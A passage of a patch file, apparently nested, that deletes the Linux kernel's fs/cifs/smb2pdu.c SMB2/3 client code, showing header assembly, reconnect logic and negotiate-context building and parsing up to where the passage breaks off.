+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-};
+-
+-struct smb_version_values smb311_values = {
+-	.version_string = SMB311_VERSION_STRING,
+-	.protocol_id = SMB311_PROT_ID,
+-	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.header_preamble_size = 0,
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-};
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+deleted file mode 100644
+index 537e8679900b8..0000000000000
+--- a/fs/cifs/smb2pdu.c
++++ /dev/null
+@@ -1,5722 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2009, 2013
+- *                 Etersoft, 2012
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Pavel Shilovsky (pshilovsky@samba.org) 2012
+- *
+- *   Contains the routines for constructing the SMB2 PDUs themselves
+- *
+- */
+-
+- /* SMB2 PDU handling routines here - except for leftovers (eg session setup) */
+- /* Note that there are handle based routines which must be		      */
+- /* treated slightly differently for reconnection purposes since we never     */
+- /* want to reuse a stale file handle and only the caller knows the file info */
+-
+-#include <linux/fs.h>
+-#include <linux/kernel.h>
+-#include <linux/vfs.h>
+-#include <linux/task_io_accounting_ops.h>
+-#include <linux/uaccess.h>
+-#include <linux/uuid.h>
+-#include <linux/pagemap.h>
+-#include <linux/xattr.h>
+-#include "cifsglob.h"
+-#include "cifsacl.h"
+-#include "cifsproto.h"
+-#include "smb2proto.h"
+-#include "cifs_unicode.h"
+-#include "cifs_debug.h"
+-#include "ntlmssp.h"
+-#include "smb2status.h"
+-#include "smb2glob.h"
+-#include "cifspdu.h"
+-#include "cifs_spnego.h"
+-#include "smbdirect.h"
+-#include "trace.h"
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dfs_cache.h"
+-#endif
+-#include "cached_dir.h"
+-
+-/*
+- *  The following table defines the expected "StructureSize" of SMB2 requests
+- *  in order by SMB2 command.  This is similar to "wct" in SMB/CIFS requests.
+- *
+- *  Note that commands are defined in smb2pdu.h in le16 but the array below is
+- *  indexed by command in host byte order.
+- */
+-static const int smb2_req_struct_sizes[NUMBER_OF_SMB2_COMMANDS] = {
+-	/* SMB2_NEGOTIATE */ 36,
+-	/* SMB2_SESSION_SETUP */ 25,
+-	/* SMB2_LOGOFF */ 4,
+-	/* SMB2_TREE_CONNECT */	9,
+-	/* SMB2_TREE_DISCONNECT */ 4,
+-	/* SMB2_CREATE */ 57,
+-	/* SMB2_CLOSE */ 24,
+-	/* SMB2_FLUSH */ 24,
+-	/* SMB2_READ */	49,
+-	/* SMB2_WRITE */ 49,
+-	/* SMB2_LOCK */	48,
+-	/* SMB2_IOCTL */ 57,
+-	/* SMB2_CANCEL */ 4,
+-	/* SMB2_ECHO */ 4,
+-	/* SMB2_QUERY_DIRECTORY */ 33,
+-	/* SMB2_CHANGE_NOTIFY */ 32,
+-	/* SMB2_QUERY_INFO */ 41,
+-	/* SMB2_SET_INFO */ 33,
+-	/* SMB2_OPLOCK_BREAK */ 24 /* BB this is 36 for LEASE_BREAK variant */
+-};
+-
+-int smb3_encryption_required(const struct cifs_tcon *tcon)
+-{
+-	if (!tcon || !tcon->ses)
+-		return 0;
+-	if ((tcon->ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA) ||
+-	    (tcon->share_flags & SHI1005_FLAGS_ENCRYPT_DATA))
+-		return 1;
+-	if (tcon->seal &&
+-	    (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
+-		return 1;
+-	return 0;
+-}
+-
+-static void
+-smb2_hdr_assemble(struct smb2_hdr *shdr, __le16 smb2_cmd,
+-		  const struct cifs_tcon *tcon,
+-		  struct TCP_Server_Info *server)
+-{
+-	shdr->ProtocolId = SMB2_PROTO_NUMBER;
+-	shdr->StructureSize = cpu_to_le16(64);
+-	shdr->Command = smb2_cmd;
+-	if (server) {
+-		spin_lock(&server->req_lock);
+-		/* Request up to 10 credits but don't go over the limit. */
+-		if (server->credits >= server->max_credits)
+-			shdr->CreditRequest = cpu_to_le16(0);
+-		else
+-			shdr->CreditRequest = cpu_to_le16(
+-				min_t(int, server->max_credits -
+-						server->credits, 10));
+-		spin_unlock(&server->req_lock);
+-	} else {
+-		shdr->CreditRequest = cpu_to_le16(2);
+-	}
+-	shdr->Id.SyncId.ProcessId = cpu_to_le32((__u16)current->tgid);
+-
+-	if (!tcon)
+-		goto out;
+-
+-	/* GLOBAL_CAP_LARGE_MTU will only be set if dialect > SMB2.02 */
+-	/* See sections 2.2.4 and 3.2.4.1.5 of MS-SMB2 */
+-	if (server && (server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
+-		shdr->CreditCharge = cpu_to_le16(1);
+-	/* else CreditCharge MBZ */
+-
+-	shdr->Id.SyncId.TreeId = cpu_to_le32(tcon->tid);
+-	/* Uid is not converted */
+-	if (tcon->ses)
+-		shdr->SessionId = cpu_to_le64(tcon->ses->Suid);
+-
+-	/*
+-	 * If we would set SMB2_FLAGS_DFS_OPERATIONS on open we also would have
+-	 * to pass the path on the Open SMB prefixed by \\server\share.
+-	 * Not sure when we would need to do the augmented path (if ever) and
+-	 * setting this flag breaks the SMB2 open operation since it is
+-	 * illegal to send an empty path name (without \\server\share prefix)
+-	 * when the DFS flag is set in the SMB open header. We could
+-	 * consider setting the flag on all operations other than open
+-	 * but it is safer to net set it for now.
+-	 */
+-/*	if (tcon->share_flags & SHI1005_FLAGS_DFS)
+-		shdr->Flags |= SMB2_FLAGS_DFS_OPERATIONS; */
+-
+-	if (server && server->sign && !smb3_encryption_required(tcon))
+-		shdr->Flags |= SMB2_FLAGS_SIGNED;
+-out:
+-	return;
+-}
+-
+-static int
+-smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+-	       struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-	struct nls_table *nls_codepage = NULL;
+-	struct cifs_ses *ses;
+-
+-	/*
+-	 * SMB2s NegProt, SessSetup, Logoff do not have tcon yet so
+-	 * check for tcp and smb session status done differently
+-	 * for those three - in the calling routine.
+-	 */
+-	if (tcon == NULL)
+-		return 0;
+-
+-	/*
+-	 * Need to also skip SMB2_IOCTL because it is used for checking nested dfs links in
+-	 * cifs_tree_connect().
+-	 */
+-	if (smb2_command == SMB2_TREE_CONNECT || smb2_command == SMB2_IOCTL)
+-		return 0;
+-
+-	spin_lock(&tcon->tc_lock);
+-	if (tcon->status == TID_EXITING) {
+-		/*
+-		 * only tree disconnect allowed when disconnecting ...
+-		 */
+-		if (smb2_command != SMB2_TREE_DISCONNECT) {
+-			spin_unlock(&tcon->tc_lock);
+-			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
+-				 smb2_command);
+-			return -ENODEV;
+-		}
+-	}
+-	spin_unlock(&tcon->tc_lock);
+-
+-	ses = tcon->ses;
+-	if (!ses)
+-		return -EIO;
+-	spin_lock(&ses->ses_lock);
+-	if (ses->ses_status == SES_EXITING) {
+-		spin_unlock(&ses->ses_lock);
+-		return -EIO;
+-	}
+-	spin_unlock(&ses->ses_lock);
+-	if (!ses->server || !server)
+-		return -EIO;
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsNeedReconnect) {
+-		/*
+-		 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
+-		 * here since they are implicitly done when session drops.
+-		 */
+-		switch (smb2_command) {
+-		/*
+-		 * BB Should we keep oplock break and add flush to exceptions?
+-		 */
+-		case SMB2_TREE_DISCONNECT:
+-		case SMB2_CANCEL:
+-		case SMB2_CLOSE:
+-		case SMB2_OPLOCK_BREAK:
+-			spin_unlock(&server->srv_lock);
+-			return -EAGAIN;
+-		}
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-again:
+-	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
+-	if (rc)
+-		return rc;
+-
+-	spin_lock(&ses->chan_lock);
+-	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+-		spin_unlock(&ses->chan_lock);
+-		return 0;
+-	}
+-	spin_unlock(&ses->chan_lock);
+-	cifs_dbg(FYI, "sess reconnect mask: 0x%lx, tcon reconnect: %d",
+-		 tcon->ses->chans_need_reconnect,
+-		 tcon->need_reconnect);
+-
+-	mutex_lock(&ses->session_mutex);
+-	/*
+-	 * Recheck after acquire mutex. If another thread is negotiating
+-	 * and the server never sends an answer the socket will be closed
+-	 * and tcpStatus set to reconnect.
+-	 */
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsNeedReconnect) {
+-		spin_unlock(&server->srv_lock);
+-		mutex_unlock(&ses->session_mutex);
+-
+-		if (tcon->retry)
+-			goto again;
+-
+-		rc = -EHOSTDOWN;
+-		goto out;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	nls_codepage = load_nls_default();
+-
+-	/*
+-	 * need to prevent multiple threads trying to simultaneously
+-	 * reconnect the same SMB session
+-	 */
+-	spin_lock(&ses->ses_lock);
+-	spin_lock(&ses->chan_lock);
+-	if (!cifs_chan_needs_reconnect(ses, server) &&
+-	    ses->ses_status == SES_GOOD) {
+-		spin_unlock(&ses->chan_lock);
+-		spin_unlock(&ses->ses_lock);
+-		/* this means that we only need to tree connect */
+-		if (tcon->need_reconnect)
+-			goto skip_sess_setup;
+-
+-		mutex_unlock(&ses->session_mutex);
+-		goto out;
+-	}
+-	spin_unlock(&ses->chan_lock);
+-	spin_unlock(&ses->ses_lock);
+-
+-	rc = cifs_negotiate_protocol(0, ses, server);
+-	if (!rc) {
+-		rc = cifs_setup_session(0, ses, server, nls_codepage);
+-		if ((rc == -EACCES) && !tcon->retry) {
+-			mutex_unlock(&ses->session_mutex);
+-			rc = -EHOSTDOWN;
+-			goto failed;
+-		} else if (rc) {
+-			mutex_unlock(&ses->session_mutex);
+-			goto out;
+-		}
+-	} else {
+-		mutex_unlock(&ses->session_mutex);
+-		goto out;
+-	}
+-
+-skip_sess_setup:
+-	if (!tcon->need_reconnect) {
+-		mutex_unlock(&ses->session_mutex);
+-		goto out;
+-	}
+-	cifs_mark_open_files_invalid(tcon);
+-	if (tcon->use_persistent)
+-		tcon->need_reopen_files = true;
+-
+-	rc = cifs_tree_connect(0, tcon, nls_codepage);
+-	mutex_unlock(&ses->session_mutex);
+-
+-	cifs_dbg(FYI, "reconnect tcon rc = %d\n", rc);
+-	if (rc) {
+-		/* If sess reconnected but tcon didn't, something strange ... */
+-		cifs_dbg(VFS, "reconnect tcon failed rc = %d\n", rc);
+-		goto out;
+-	}
+-
+-	if (smb2_command != SMB2_INTERNAL_CMD)
+-		mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
+-
+-	atomic_inc(&tconInfoReconnectCount);
+-out:
+-	/*
+-	 * Check if handle based operation so we know whether we can continue
+-	 * or not without returning to caller to reset file handle.
+-	 */
+-	/*
+-	 * BB Is flush done by server on drop of tcp session? Should we special
+-	 * case it and skip above?
+-	 */
+-	switch (smb2_command) {
+-	case SMB2_FLUSH:
+-	case SMB2_READ:
+-	case SMB2_WRITE:
+-	case SMB2_LOCK:
+-	case SMB2_IOCTL:
+-	case SMB2_QUERY_DIRECTORY:
+-	case SMB2_CHANGE_NOTIFY:
+-	case SMB2_QUERY_INFO:
+-	case SMB2_SET_INFO:
+-		rc = -EAGAIN;
+-	}
+-failed:
+-	unload_nls(nls_codepage);
+-	return rc;
+-}
+-
+-static void
+-fill_small_buf(__le16 smb2_command, struct cifs_tcon *tcon,
+-	       struct TCP_Server_Info *server,
+-	       void *buf,
+-	       unsigned int *total_len)
+-{
+-	struct smb2_pdu *spdu = buf;
+-	/* lookup word count ie StructureSize from table */
+-	__u16 parmsize = smb2_req_struct_sizes[le16_to_cpu(smb2_command)];
+-
+-	/*
+-	 * smaller than SMALL_BUFFER_SIZE but bigger than fixed area of
+-	 * largest operations (Create)
+-	 */
+-	memset(buf, 0, 256);
+-
+-	smb2_hdr_assemble(&spdu->hdr, smb2_command, tcon, server);
+-	spdu->StructureSize2 = cpu_to_le16(parmsize);
+-
+-	*total_len = parmsize + sizeof(struct smb2_hdr);
+-}
+-
+-/*
+- * Allocate and return pointer to an SMB request hdr, and set basic
+- * SMB information in the SMB header. If the return code is zero, this
+- * function must have filled in request_buf pointer.
+- */
+-static int __smb2_plain_req_init(__le16 smb2_command, struct cifs_tcon *tcon,
+-				 struct TCP_Server_Info *server,
+-				 void **request_buf, unsigned int *total_len)
+-{
+-	/* BB eventually switch this to SMB2 specific small buf size */
+-	if (smb2_command == SMB2_SET_INFO)
+-		*request_buf = cifs_buf_get();
+-	else
+-		*request_buf = cifs_small_buf_get();
+-	if (*request_buf == NULL) {
+-		/* BB should we add a retry in here if not a writepage? */
+-		return -ENOMEM;
+-	}
+-
+-	fill_small_buf(smb2_command, tcon, server,
+-		       (struct smb2_hdr *)(*request_buf),
+-		       total_len);
+-
+-	if (tcon != NULL) {
+-		uint16_t com_code = le16_to_cpu(smb2_command);
+-		cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_sent[com_code]);
+-		cifs_stats_inc(&tcon->num_smbs_sent);
+-	}
+-
+-	return 0;
+-}
+-
+-static int smb2_plain_req_init(__le16 smb2_command, struct cifs_tcon *tcon,
+-			       struct TCP_Server_Info *server,
+-			       void **request_buf, unsigned int *total_len)
+-{
+-	int rc;
+-
+-	rc = smb2_reconnect(smb2_command, tcon, server);
+-	if (rc)
+-		return rc;
+-
+-	return __smb2_plain_req_init(smb2_command, tcon, server, request_buf,
+-				     total_len);
+-}
+-
+-static int smb2_ioctl_req_init(u32 opcode, struct cifs_tcon *tcon,
+-			       struct TCP_Server_Info *server,
+-			       void **request_buf, unsigned int *total_len)
+-{
+-	/* Skip reconnect only for FSCTL_VALIDATE_NEGOTIATE_INFO IOCTLs */
+-	if (opcode == FSCTL_VALIDATE_NEGOTIATE_INFO) {
+-		return __smb2_plain_req_init(SMB2_IOCTL, tcon, server,
+-					     request_buf, total_len);
+-	}
+-	return smb2_plain_req_init(SMB2_IOCTL, tcon, server,
+-				   request_buf, total_len);
+-}
+-
+-/* For explanation of negotiate contexts see MS-SMB2 section 2.2.3.1 */
+-
+-static void
+-build_preauth_ctxt(struct smb2_preauth_neg_context *pneg_ctxt)
+-{
+-	pneg_ctxt->ContextType = SMB2_PREAUTH_INTEGRITY_CAPABILITIES;
+-	pneg_ctxt->DataLength = cpu_to_le16(38);
+-	pneg_ctxt->HashAlgorithmCount = cpu_to_le16(1);
+-	pneg_ctxt->SaltLength = cpu_to_le16(SMB311_SALT_SIZE);
+-	get_random_bytes(pneg_ctxt->Salt, SMB311_SALT_SIZE);
+-	pneg_ctxt->HashAlgorithms = SMB2_PREAUTH_INTEGRITY_SHA512;
+-}
+-
+-static void
+-build_compression_ctxt(struct smb2_compression_capabilities_context *pneg_ctxt)
+-{
+-	pneg_ctxt->ContextType = SMB2_COMPRESSION_CAPABILITIES;
+-	pneg_ctxt->DataLength =
+-		cpu_to_le16(sizeof(struct smb2_compression_capabilities_context)
+-			  - sizeof(struct smb2_neg_context));
+-	pneg_ctxt->CompressionAlgorithmCount = cpu_to_le16(3);
+-	pneg_ctxt->CompressionAlgorithms[0] = SMB3_COMPRESS_LZ77;
+-	pneg_ctxt->CompressionAlgorithms[1] = SMB3_COMPRESS_LZ77_HUFF;
+-	pneg_ctxt->CompressionAlgorithms[2] = SMB3_COMPRESS_LZNT1;
+-}
+-
+-static unsigned int
+-build_signing_ctxt(struct smb2_signing_capabilities *pneg_ctxt)
+-{
+-	unsigned int ctxt_len = sizeof(struct smb2_signing_capabilities);
+-	unsigned short num_algs = 1; /* number of signing algorithms sent */
+-
+-	pneg_ctxt->ContextType = SMB2_SIGNING_CAPABILITIES;
+-	/*
+-	 * Context Data length must be rounded to multiple of 8 for some servers
+-	 */
+-	pneg_ctxt->DataLength = cpu_to_le16(ALIGN(sizeof(struct smb2_signing_capabilities) -
+-					    sizeof(struct smb2_neg_context) +
+-					    (num_algs * sizeof(u16)), 8));
+-	pneg_ctxt->SigningAlgorithmCount = cpu_to_le16(num_algs);
+-	pneg_ctxt->SigningAlgorithms[0] = cpu_to_le16(SIGNING_ALG_AES_CMAC);
+-
+-	ctxt_len += sizeof(__le16) * num_algs;
+-	ctxt_len = ALIGN(ctxt_len, 8);
+-	return ctxt_len;
+-	/* TBD add SIGNING_ALG_AES_GMAC and/or SIGNING_ALG_HMAC_SHA256 */
+-}
+-
+-static void
+-build_encrypt_ctxt(struct smb2_encryption_neg_context *pneg_ctxt)
+-{
+-	pneg_ctxt->ContextType = SMB2_ENCRYPTION_CAPABILITIES;
+-	if (require_gcm_256) {
+-		pneg_ctxt->DataLength = cpu_to_le16(4); /* Cipher Count + 1 cipher */
+-		pneg_ctxt->CipherCount = cpu_to_le16(1);
+-		pneg_ctxt->Ciphers[0] = SMB2_ENCRYPTION_AES256_GCM;
+-	} else if (enable_gcm_256) {
+-		pneg_ctxt->DataLength = cpu_to_le16(8); /* Cipher Count + 3 ciphers */
+-		pneg_ctxt->CipherCount = cpu_to_le16(3);
+-		pneg_ctxt->Ciphers[0] = SMB2_ENCRYPTION_AES128_GCM;
+-		pneg_ctxt->Ciphers[1] = SMB2_ENCRYPTION_AES256_GCM;
+-		pneg_ctxt->Ciphers[2] = SMB2_ENCRYPTION_AES128_CCM;
+-	} else {
+-		pneg_ctxt->DataLength = cpu_to_le16(6); /* Cipher Count + 2 ciphers */
+-		pneg_ctxt->CipherCount = cpu_to_le16(2);
+-		pneg_ctxt->Ciphers[0] = SMB2_ENCRYPTION_AES128_GCM;
+-		pneg_ctxt->Ciphers[1] = SMB2_ENCRYPTION_AES128_CCM;
+-	}
+-}
+-
+-static unsigned int
+-build_netname_ctxt(struct smb2_netname_neg_context *pneg_ctxt, char *hostname)
+-{
+-	struct nls_table *cp = load_nls_default();
+-
+-	pneg_ctxt->ContextType = SMB2_NETNAME_NEGOTIATE_CONTEXT_ID;
+-
+-	/* copy up to max of first 100 bytes of server name to NetName field */
+-	pneg_ctxt->DataLength = cpu_to_le16(2 * cifs_strtoUTF16(pneg_ctxt->NetName, hostname, 100, cp));
+-	/* context size is DataLength + minimal smb2_neg_context */
+-	return ALIGN(le16_to_cpu(pneg_ctxt->DataLength) + sizeof(struct smb2_neg_context), 8);
+-}
+-
+-static void
+-build_posix_ctxt(struct smb2_posix_neg_context *pneg_ctxt)
+-{
+-	pneg_ctxt->ContextType = SMB2_POSIX_EXTENSIONS_AVAILABLE;
+-	pneg_ctxt->DataLength = cpu_to_le16(POSIX_CTXT_DATA_LEN);
+-	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
+-	pneg_ctxt->Name[0] = 0x93;
+-	pneg_ctxt->Name[1] = 0xAD;
+-	pneg_ctxt->Name[2] = 0x25;
+-	pneg_ctxt->Name[3] = 0x50;
+-	pneg_ctxt->Name[4] = 0x9C;
+-	pneg_ctxt->Name[5] = 0xB4;
+-	pneg_ctxt->Name[6] = 0x11;
+-	pneg_ctxt->Name[7] = 0xE7;
+-	pneg_ctxt->Name[8] = 0xB4;
+-	pneg_ctxt->Name[9] = 0x23;
+-	pneg_ctxt->Name[10] = 0x83;
+-	pneg_ctxt->Name[11] = 0xDE;
+-	pneg_ctxt->Name[12] = 0x96;
+-	pneg_ctxt->Name[13] = 0x8B;
+-	pneg_ctxt->Name[14] = 0xCD;
+-	pneg_ctxt->Name[15] = 0x7C;
+-}
+-
+-static void
+-assemble_neg_contexts(struct smb2_negotiate_req *req,
+-		      struct TCP_Server_Info *server, unsigned int *total_len)
+-{
+-	unsigned int ctxt_len, neg_context_count;
+-	struct TCP_Server_Info *pserver;
+-	char *pneg_ctxt;
+-	char *hostname;
+-
+-	if (*total_len > 200) {
+-		/* In case length corrupted don't want to overrun smb buffer */
+-		cifs_server_dbg(VFS, "Bad frame length assembling neg contexts\n");
+-		return;
+-	}
+-
+-	/*
+-	 * round up total_len of fixed part of SMB3 negotiate request to 8
+-	 * byte boundary before adding negotiate contexts
+-	 */
+-	*total_len = ALIGN(*total_len, 8);
+-
+-	pneg_ctxt = (*total_len) + (char *)req;
+-	req->NegotiateContextOffset = cpu_to_le32(*total_len);
+-
+-	build_preauth_ctxt((struct smb2_preauth_neg_context *)pneg_ctxt);
+-	ctxt_len = ALIGN(sizeof(struct smb2_preauth_neg_context), 8);
+-	*total_len += ctxt_len;
+-	pneg_ctxt += ctxt_len;
+-
+-	build_encrypt_ctxt((struct smb2_encryption_neg_context *)pneg_ctxt);
+-	ctxt_len = ALIGN(sizeof(struct smb2_encryption_neg_context), 8);
+-	*total_len += ctxt_len;
+-	pneg_ctxt += ctxt_len;
+-
+-	/*
+-	 * secondary channels don't have the hostname field populated
+-	 * use the hostname field in the primary channel instead
+-	 */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-	cifs_server_lock(pserver);
+-	hostname = pserver->hostname;
+-	if (hostname && (hostname[0] != 0)) {
+-		ctxt_len = build_netname_ctxt((struct smb2_netname_neg_context *)pneg_ctxt,
+-					      hostname);
+-		*total_len += ctxt_len;
+-		pneg_ctxt += ctxt_len;
+-		neg_context_count = 3;
+-	} else
+-		neg_context_count = 2;
+-	cifs_server_unlock(pserver);
+-
+-	build_posix_ctxt((struct smb2_posix_neg_context *)pneg_ctxt);
+-	*total_len += sizeof(struct smb2_posix_neg_context);
+-	pneg_ctxt += sizeof(struct smb2_posix_neg_context);
+-	neg_context_count++;
+-
+-	if (server->compress_algorithm) {
+-		build_compression_ctxt((struct smb2_compression_capabilities_context *)
+-				pneg_ctxt);
+-		ctxt_len = ALIGN(sizeof(struct smb2_compression_capabilities_context), 8);
+-		*total_len += ctxt_len;
+-		pneg_ctxt += ctxt_len;
+-		neg_context_count++;
+-	}
+-
+-	if (enable_negotiate_signing) {
+-		ctxt_len = build_signing_ctxt((struct smb2_signing_capabilities *)
+-				pneg_ctxt);
+-		*total_len += ctxt_len;
+-		pneg_ctxt += ctxt_len;
+-		neg_context_count++;
+-	}
+-
+-	/* check for and add transport_capabilities and signing capabilities */
+-	req->NegotiateContextCount = cpu_to_le16(neg_context_count);
+-
+-}
+-
+-/* If invalid preauth context warn but use what we requested, SHA-512 */
+-static void decode_preauth_context(struct smb2_preauth_neg_context *ctxt)
+-{
+-	unsigned int len = le16_to_cpu(ctxt->DataLength);
+-
+-	/*
+-	 * Caller checked that DataLength remains within SMB boundary. We still
+-	 * need to confirm that one HashAlgorithms member is accounted for.
+-	 */
+-	if (len < MIN_PREAUTH_CTXT_DATA_LEN) {
+-		pr_warn_once("server sent bad preauth context\n");
+-		return;
+-	} else if (len < MIN_PREAUTH_CTXT_DATA_LEN + le16_to_cpu(ctxt->SaltLength)) {
+-		pr_warn_once("server sent invalid SaltLength\n");
+-		return;
+-	}
+-	if (le16_to_cpu(ctxt->HashAlgorithmCount) != 1)
+-		pr_warn_once("Invalid SMB3 hash algorithm count\n");
+-	if (ctxt->HashAlgorithms != SMB2_PREAUTH_INTEGRITY_SHA512)
+-		pr_warn_once("unknown SMB3 hash algorithm\n");
+-}
+-
+-static void decode_compress_ctx(struct TCP_Server_Info *server,
+-			 struct smb2_compression_capabilities_context *ctxt)
+-{
+-	unsigned int len = le16_to_cpu(ctxt->DataLength);
+-
+-	/*
+-	 * Caller checked that DataLength remains within SMB boundary. We still
+-	 * need to confirm that one CompressionAlgorithms member is accounted
+-	 * for.
+-	 */
+-	if (len < 10) {
+-		pr_warn_once("server sent bad compression cntxt\n");
+-		return;
+-	}
+-	if (le16_to_cpu(ctxt->CompressionAlgorithmCount) != 1) {
+-		pr_warn_once("Invalid SMB3 compress algorithm count\n");
+-		return;
+-	}
+-	if (le16_to_cpu(ctxt->CompressionAlgorithms[0]) > 3) {
+-		pr_warn_once("unknown compression algorithm\n");
+-		return;
+-	}
+-	server->compress_algorithm = ctxt->CompressionAlgorithms[0];
+-}
+-
+-static int decode_encrypt_ctx(struct TCP_Server_Info *server,
+-			      struct smb2_encryption_neg_context *ctxt)
+-{
+-	unsigned int len = le16_to_cpu(ctxt->DataLength);
+-
+-	cifs_dbg(FYI, "decode SMB3.11 encryption neg context of len %d\n", len);
+-	/*
+-	 * Caller checked that DataLength remains within SMB boundary. We still
+-	 * need to confirm that one Cipher flexible array member is accounted
+-	 * for.
+-	 */
+-	if (len < MIN_ENCRYPT_CTXT_DATA_LEN) {
+-		pr_warn_once("server sent bad crypto ctxt len\n");
+-		return -EINVAL;
+-	}
+-
+-	if (le16_to_cpu(ctxt->CipherCount) != 1) {
+-		pr_warn_once("Invalid SMB3.11 cipher count\n");
+-		return -EINVAL;
+-	}
+-	cifs_dbg(FYI, "SMB311 cipher type:%d\n", le16_to_cpu(ctxt->Ciphers[0]));
+-	if (require_gcm_256) {
+-		if (ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES256_GCM) {
+-			cifs_dbg(VFS, "Server does not support requested encryption type (AES256 GCM)\n");
+-			return -EOPNOTSUPP;
+-		}
+-	} else if (ctxt->Ciphers[0] == 0) {
+-		/*
+-		 * e.g. if server only supported AES256_CCM (very unlikely)
+-		 * or server supported no encryption types or had all disabled.
+-		 * Since GLOBAL_CAP_ENCRYPTION will be not set, in the case
+-		 * in which mount requested encryption ("seal") checks later
+-		 * on during tree connection will return proper rc, but if
+-		 * seal not requested by client, since server is allowed to
+-		 * return 0 to indicate no supported cipher, we can't fail here
+-		 */
+-		server->cipher_type = 0;
+-		server->capabilities &= ~SMB2_GLOBAL_CAP_ENCRYPTION;
+-		pr_warn_once("Server does not support requested encryption types\n");
+-		return 0;
+-	} else if ((ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES128_CCM) &&
+-		   (ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES128_GCM) &&
+-		   (ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES256_GCM)) {
+-		/* server returned a cipher we didn't ask for */
+-		pr_warn_once("Invalid SMB3.11 cipher returned\n");
+-		return -EINVAL;
+-	}
+-	server->cipher_type = ctxt->Ciphers[0];
+-	server->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
+-	return 0;
+-}
+-
+-static void decode_signing_ctx(struct TCP_Server_Info *server,
+-			       struct smb2_signing_capabilities *pctxt)
+-{
+-	unsigned int len = le16_to_cpu(pctxt->DataLength);
+-
+-	/*
+-	 * Caller checked that DataLength remains within SMB boundary. We still
+-	 * need to confirm that one SigningAlgorithms flexible array member is
+-	 * accounted for.
+-	 */
+-	if ((len < 4) || (len > 16)) {
+-		pr_warn_once("server sent bad signing negcontext\n");
+-		return;
+-	}
+-	if (le16_to_cpu(pctxt->SigningAlgorithmCount) != 1) {
+-		pr_warn_once("Invalid signing algorithm count\n");
+-		return;
+-	}
+-	if (le16_to_cpu(pctxt->SigningAlgorithms[0]) > 2) {
+-		pr_warn_once("unknown signing algorithm\n");
+-		return;
+-	}
+-
+-	server->signing_negotiated = true;
+-	server->signing_algorithm = le16_to_cpu(pctxt->SigningAlgorithms[0]);
+-	cifs_dbg(FYI, "signing algorithm %d chosen\n",
+-		     server->signing_algorithm);
+-}
+-
+-
+-static int smb311_decode_neg_context(struct smb2_negotiate_rsp *rsp,
+-				     struct TCP_Server_Info *server,
+-				     unsigned int len_of_smb)
+-{
+-	struct smb2_neg_context *pctx;
+-	unsigned int offset = le32_to_cpu(rsp->NegotiateContextOffset);
+-	unsigned int ctxt_cnt = le16_to_cpu(rsp->NegotiateContextCount);
+-	unsigned int len_of_ctxts, i;
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "decoding %d negotiate contexts\n", ctxt_cnt);
+-	if (len_of_smb <= offset) {
+-		cifs_server_dbg(VFS, "Invalid response: negotiate context offset\n");
+-		return -EINVAL;
+-	}
+-
+-	len_of_ctxts = len_of_smb - offset;
+-
+-	for (i = 0; i < ctxt_cnt; i++) {
+-		int clen;
+-		/* check that offset is not beyond end of SMB */
+-		if (len_of_ctxts < sizeof(struct smb2_neg_context))
+-			break;
+-
+-		pctx = (struct smb2_neg_context *)(offset + (char *)rsp);
+-		clen = sizeof(struct smb2_neg_context)
